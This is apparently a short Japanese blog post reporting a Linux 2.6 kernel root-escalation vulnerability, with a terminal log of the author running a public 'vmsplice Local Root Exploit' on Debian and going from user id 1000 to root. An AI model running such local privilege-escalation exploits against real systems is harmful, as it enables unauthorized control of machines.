Linuxカーネル2.6系にroot権限を奪われる脆弱性が発見される
コメントにあったように、試してみると確かに昇格した・・・!
katsuji@debian:~$ cat /proc/version
Linux version 2.6.18-5-686 (Debian 2.6.18.dfsg.1-17) (dannf@debian.org) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Mon Dec 24 16:41:07 UTC 2007
katsuji@debian:~$ id -u
1000
katsuji@debian:~$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e76000 .. 0xb7ea8000
[+] root
root@debian:~# id -u
0
exploit をみつけるひとは、なにをどうやってみつけるんだろう。。
0 件のコメント:
コメントを投稿